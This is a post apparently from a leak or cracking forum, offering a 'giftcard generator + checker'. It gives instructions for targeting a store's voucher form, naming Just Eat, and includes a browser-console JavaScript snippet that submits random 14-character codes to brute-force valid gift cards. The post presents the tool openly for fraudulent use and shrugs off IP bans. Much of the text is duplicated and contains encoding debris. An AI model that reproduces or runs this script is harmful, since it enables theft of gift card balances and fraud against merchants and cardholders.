OP Posted at 28-09-2021, 11:07 AM
(This post was last modified: 28-09-2021, 11:08 AM by INFINITY.)
GIFTCARD GENERATOR + CHECKER
Works with voucher codes and
Bruteforce ANY Giftcard with a simple webscript
Â
*NO DOWNLOAD*
*REALLY HIGH CPM*
I'm not responsible for any temporary IP ban nor any account limitation you might encounter.
NOTE: won't work if there's a captcha or image verification
Works with voucher codes and
Bruteforce ANY Giftcard with a simple webscript
Â
*NO DOWNLOAD*
*REALLY HIGH CPM*
I'm not responsible for any temporary IP ban nor any account limitation you might encounter.
NOTE: won't work if there's a captcha or image verification
[ Hidden Content! ]
Let's take Just Eat as example
Change the giftcard type/range to generate (alphanumeric/number only/letter only).
Change the max length of the possible input.
Â
Then inspect element the input box and the submit button to get the variable names.
Â
https://prnt.sc/nz874m
Â
 and replace it in the code like this...
https://prnt.sc/nz87ir
Â
After that, just paste the code in the console and click on Enter.
Â
DEMO:Â https://imgur.com/a/TY93qcw
Change the giftcard type/range to generate (alphanumeric/number only/letter only).
Change the max length of the possible input.
Â
Then inspect element the input box and the submit button to get the variable names.
Â
https://prnt.sc/nz874m
Â
 and replace it in the code like this...
https://prnt.sc/nz87ir
Â
After that, just paste the code in the console and click on Enter.
Â
DEMO:Â https://imgur.com/a/TY93qcw
[ Hidden Content! ]
var speed = prompt("Type 1,000 if your PC is fast, 500 for a slow pc")
function makeid() {
 var text = "";
 var possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";  //enter the variables of the gift card *CAN BE CASE SENTITIVE DEPENDING ON THE GC*
Â
 for (var i = 0; i < 14; i++)  //change the value depending on the length of the giftcard code
  text += possible.charAt(Math.floor(Math.random() * possible.length));
Â
 return text;
}
Â
Â
function main() {
  document.getElementById("INPUTBOXNAME").value = makeid();
  document.getElementById("SUBMITBUTTONNAME").click();
}
Â
setInterval(function() {
  main();
}, speed);
function makeid() {
 var text = "";
 var possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";  //enter the variables of the gift card *CAN BE CASE SENTITIVE DEPENDING ON THE GC*
Â
 for (var i = 0; i < 14; i++)  //change the value depending on the length of the giftcard code
  text += possible.charAt(Math.floor(Math.random() * possible.length));
Â
 return text;
}
Â
Â
function main() {
  document.getElementById("INPUTBOXNAME").value = makeid();
  document.getElementById("SUBMITBUTTONNAME").click();
}
Â
setInterval(function() {
  main();
}, speed);
WorkingThis leak has been rated as still working 0 times this week. (3 in total)
Not working!This leak has been rated as not working 0 times this week. (3 in total)
Selling Signature. PM To Buy!